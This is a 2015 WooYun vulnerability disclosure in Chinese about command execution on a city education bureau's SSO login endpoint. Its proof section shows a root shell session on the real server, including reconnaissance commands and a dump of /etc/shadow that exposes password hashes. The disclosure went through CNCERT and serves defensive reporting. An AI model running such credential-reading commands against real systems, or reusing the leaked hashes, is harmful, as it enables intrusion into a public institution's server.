当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153547

漏洞标题:某市教育局官网命令执行漏洞getshell

相关厂商:cncert国家互联网应急中心

漏洞作者: 朱元璋

提交时间:2015-11-11 15:56

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-11: 细节已通知厂商并且等待厂商处理中
2015-11-23: 厂商已经确认,细节仅向厂商公开
2015-12-03: 细节向核心白帽子及相关领域专家公开
2015-12-13: 细节向普通白帽子公开
2015-12-23: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RT

详细说明:

打开官网地址http://**.**.**.**/点击图中标识链接

0.png

00.jpg


链接地址**.**.**.**:8080/SSOServer/login_checkUser.action存在命令执行漏洞

000001.png


1.png


漏洞证明:

 
> whoami
====================================================================================================================================
root
> id
====================================================================================================================================
uid=0(root) gid=0(root) ?=0(root) ??=unconfined_u:unconfined_r:unconfined_java_t:s0-s0:c0.c1023
> ifconfig
====================================================================================================================================
eth0 Link encap:Ethernet HWaddr 00:50:56:A8:54:9E
inet addr:**.**.**.** Bcast:**.**.**.** Mask:**.**.**.**
inet6 addr: fe80::250:56ff:fea8:549e/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:52148005 errors:0 dropped:0 overruns:0 frame:0
TX packets:21399861 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1553852628 (1.4 GiB) TX bytes:1089562689 (1.0 GiB)
lo Link encap:Local Loopback
inet addr:**.**.**.** Mask:**.**.**.**
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:38900058 errors:0 dropped:0 overruns:0 frame:0
TX packets:38900058 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:1603862680 (1.4 GiB) TX bytes:1603862680 (1.4 GiB)
> ls
====================================================================================================================================
bin
conf
G:
lib
LICENSE
logs
NOTICE
RELEASE-NOTES
RUNNING.txt
temp
webapps
work
> uname -a
====================================================================================================================================
Linux localhost.localdomain 2.6.32-358.el6.i686 #1 SMP Tue Jan 29 11:48:01 EST 2013 i686 i686 i386 GNU/Linux
> uname -r
====================================================================================================================================
2.6.32-358.el6.i686
> lsb_release -a
====================================================================================================================================
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
> cat /etc/issue
====================================================================================================================================
Red Hat Enterprise Linux Server release 6.4 (Santiago)
Kernel \r on an \m
> cat /etc/lsb-release
====================================================================================================================================
LSB_VERSION=base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
> cat /proc/version
====================================================================================================================================
Linux version 2.6.32-358.el6.i686 (mockbuild@**.**.**.**) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-3) (GCC) ) #1 SMP Tue Jan 29 11:48:01 EST 2013
> cat /etc/shadow
====================================================================================================================================
root:$6$PFVm7let4x2FBZIi$JQfq8zpNhC4.bOIM26K1beqpWB0/eKYVCL1dEFvOvNdIRMbvKHwdgCeB1h4lIg9X8TMh5G1hipE/TieuwaMGH/:16528:0:99999:7:::
bin:*:15615:0:99999:7:::
daemon:*:15615:0:99999:7:::
adm:*:15615:0:99999:7:::
lp:*:15615:0:99999:7:::
sync:*:15615:0:99999:7:::
shutdown:*:15615:0:99999:7:::
halt:*:15615:0:99999:7:::
mail:*:15615:0:99999:7:::
uucp:*:15615:0:99999:7:::
operator:*:15615:0:99999:7:::
games:*:15615:0:99999:7:::
gopher:*:15615:0:99999:7:::
ftp:*:15615:0:99999:7:::
nobody:*:15615:0:99999:7:::
dbus:!!:16528::::::
usbmuxd:!!:16528::::::
vcsa:!!:16528::::::
rpc:!!:16528:0:99999:7:::
rtkit:!!:16528::::::
avahi-autoipd:!!:16528::::::
pulse:!!:16528::::::
haldaemon:!!:16528::::::
ntp:!!:16528::::::
apache:!!:16528::::::
saslauth:!!:16528::::::
postfix:!!:16528::::::
abrt:!!:16528::::::
rpcuser:!!:16528::::::
nfsnobody:!!:16528::::::
gdm:!!:16528::::::
sshd:!!:16528::::::
tcpdump:!!:16528::::::
better:$6$RPFOVRr7RDaFiHwB$6AbnNELKlHqsX3eghMZCBfDcdLpsi2EaWAimUpsxjLm585efSefnzNGsqexnWLG3ar46iGkyBW1cHfU4/X.Dp1:16528:0:99999:7:::
mysql:!!:16528::::::
> chkconfig --list
====================================================================================================================================
NetworkManager 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
abrt-ccpp 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
abrtd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
acpid 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
atd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
auditd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
autofs 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
blk-availability 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
bluetooth 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
certmonger 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
cpuspeed 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
crond 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
cups 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
dnsmasq 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
firstboot 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
haldaemon 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
htcacheclean 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
httpd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
ip6tables 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
iptables 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
irqbalance 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
kdump 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
lvm2-monitor 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
mdmonitor 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
messagebus 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
mysqld 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
netconsole 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
netfs 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
network 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
nfs 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
nfslock 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
ntpd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
ntpdate 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
oddjobd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
portreserve 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
postfix 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
psacct 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
quota_nld 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rdisc 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
restorecond 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rhnsd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rhsmcertd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rngd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rpcbind 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rpcgssd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rpcidmapd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rpcsvcgssd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
rsyslog 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
saslauthd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
smartd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
snmpd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
snmptrapd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?
> chkconfig --list atd
====================================================================================================================================
atd 0:?? 1:?? 2:?? 3:?? 4:?? 5:?? 6:??
> cat /etc/resolv.conf
====================================================================================================================================
# Generated by NetworkManager
nameserver **.**.**.**
> lsb_release -a
====================================================================================================================================
LSB Version: :base-4.0-ia32:base-4.0-noarch:core-4.0-ia32:core-4.0-noarch:graphics-4.0-ia32:graphics-4.0-noarch:printing-4.0-ia32:printing-4.0-noarch
> netstat -na
====================================================================================================================================
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 **.**.**.**:53001 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:3306 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:111 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:22 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:631 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:25 **.**.**.**:* LISTEN
tcp 0 0 **.**.**.**:3306 **.**.**.**:48283 ESTABLISHED
tcp 0 0 **.**.**.**:22 **.**.**.**:3772 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:48282 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:48279 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:48280 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:48281 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:48278 ESTABLISHED
tcp 0 0 **.**.**.**:3306 **.**.**.**:48277 ESTABLISHED
tcp 0 0 :::8009 :::* LISTEN
tcp 0 0 :::111 :::* LISTEN
tcp 0 0 :::8080 :::* LISTEN
tcp 0 0 :::22 :::* LISTEN
tcp 0 0 ::1:631 :::* LISTEN
tcp 0 0 ::1:25 :::* LISTEN
tcp 0 0 ::ffff:**.**.**.**:8005 :::* LISTEN
tcp 0 0 :::33829 :::* LISTEN
tcp 0 0 ::ffff:**.**.**.**:48283 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7996 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7994 TIME_WAIT
tcp 0 0 ::ffff:**.**.**.**:48281 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:48277 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 1 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7970 CLOSE_WAIT
tcp 0 0 ::ffff:**.**.**.**:48280 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:48278 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:48282 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:48279 ::ffff:**.**.**.**:3306 ESTABLISHED
tcp 0 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7987 TIME_WAIT
tcp 0 0 ::ffff:**.**.**.**:8080 ::ffff:**.**.**.**:7991 TIME_WAIT
udp 0 0 **.**.**.**:933 **.**.**.**:*
udp 0 0 **.**.**.**:54873 **.**.**.**:*
udp 0 0 **.**.**.**:111 **.**.**.**:*
udp 0 0 **.**.**.**:631 **.**.**.**:*
udp 0 0 **.**.**.**:123 **.**.**.**:*
udp 0 0 **.**.**.**:123 **.**.**.**:*
udp 0 0 **.**.**.**:123 **.**.**.**:*
udp 0 0 **.**.**.**:636 **.**.**.**:*
udp 0 0 :::38167 :::*
udp 0 0 :::933 :::*
udp 0 0 :::111  

修复方案:

加强安全意识

版权声明:转载请注明来源 朱元璋@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-11-23 09:39

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给河南分中心,由河南分中心后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评价